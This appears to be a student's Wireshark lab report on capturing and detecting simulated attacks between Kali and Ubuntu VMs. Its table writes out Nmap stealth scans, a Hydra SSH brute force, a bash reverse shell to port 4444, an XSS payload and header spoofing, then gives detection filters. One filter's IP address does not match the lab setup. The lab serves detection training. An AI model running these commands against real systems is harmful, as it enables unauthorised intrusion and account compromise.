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Wireshark Network Traffic Analysis Lab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capture, analyze, and interpret network traffic between a simulated attacker (Kali Linux) and a target system (Ubuntu), using Wireshark. This lab aims to build foundational skills in network forensics, threat detection, and packet inspection through hands-on simulation.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 Setup:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:tblW w:w="5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"/>
        <w:gridCol w:w="3995"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1595"/>
            <w:gridCol w:w="39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Attacker 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Kali Linux (Internal Network: LabNet)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Victim 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Ubuntu Desktop (Internal Network)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Capture Tool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Wireshark on Kali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Network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VirtualBox Internal Network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Attacker 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192.168.1.6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Victim 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192.168.1.4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Wireshark (packet analysis)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Nmap (network scanning)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Hydra (brute force attack)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Curl (HTTP request testing)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Ping (ICMP test)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Apache2 (web server on victim)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Started Wireshark on Kali and captured traffic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eth0</w:t>
      </w:r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Simulated various types of network activity from Kali to Ubuntu Victim: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4.9520766773162"/>
        <w:gridCol w:w="5911.054313099041"/>
        <w:gridCol w:w="1873.9936102236422"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1574.9520766773162"/>
            <w:gridCol w:w="5911.054313099041"/>
            <w:gridCol w:w="1873.993610223642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ping 192.168.1.4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ICMP echo requests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Nmap SYN Scan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nmap -sS 192.168.1.4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Half-open TCP scan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Nmap FIN Scan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nmap -sF 192.168.1.4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Firewall evasion scan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Nmap Xmas Scan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nmap -sX 192.168.1.4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Xmas tree flags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SSH Brute Force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hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.4 -t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Repeated login attempts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HTTP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curl http://192.168.1.4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Web GET request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Reverse Shell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bash -i &gt;&amp; /dev/tcp/192.168.1.6/4444 0&gt;&amp;1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Simulated beaconing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Malicious Header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curl -A "EvilScanner/1.0" http://192.168.1.4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Custom User-Agent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XSS Payload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curl -X POST -d "&lt;script&gt;alert('xss')&lt;/script&gt;" http://192.168.1.4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Script injection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Header Spoofing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curl -H "X-Forwarded-For: 10.10.10.10" http://192.168.1.4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IP spoofing header</w:t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Saved capture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wireshark_lab_1.pcap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Packet Analysis Summary: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3.6102236421723"/>
        <w:gridCol w:w="4460.702875399361"/>
        <w:gridCol w:w="2905.6869009584666"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1993.6102236421723"/>
            <w:gridCol w:w="4460.702875399361"/>
            <w:gridCol w:w="2905.68690095846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Traffic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Filter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Findings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ICMP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icmp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Successful echo request/reply packets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TCP SYN Scan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tcp.flags.syn == 1 and tcp.flags.ack ==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Stealth scanning (SYN only)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FIN Scan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tcp.flags.fin ==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FIN-only packets (scan evasion)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Xmas Scan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tcp.flags.fin == 1 and tcp.flags.urg == 1 and tcp.flags.push ==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Detected scan with unusual flags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SSH Login Attempts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tcp.port == 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Multiple connections indicating brute force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HTTP GET/POST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Accessed Apache2 web server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Reverse Shell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ip.addr == 192.168.56.20 and tcp.port == 4444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Outbound beacon to attacker’s listener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HTTP Header Anomalies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http.user_agent</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> / inspect manually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Malicious scanner User-Agent and headers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 Included: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ICMP packet details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Nmap scan traffic with flags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SSH brute force pattern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Suspicious HTTP headers and payloads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Observations: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Victim VM responded to various ICMP and TCP probes.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Nmap scan types had distinct flag and TTL patterns.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SSH brute-force attack was visible with repetitive connection attempts.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Reverse shell connection mimicked C2 malware behavior.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HTTP headers and payloads suggested scanning and exploitation techniques.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The Wireshark lab demonstrated how attackers can be detected through network traffic inspection. By simulating various attack scenarios and capturing them live, I practiced using filters, identifying scan types, and analyzing suspicious payloads. This exercise strengthened my understanding of packet behavior during reconnaissance, exploitation, and post-exploitation phases.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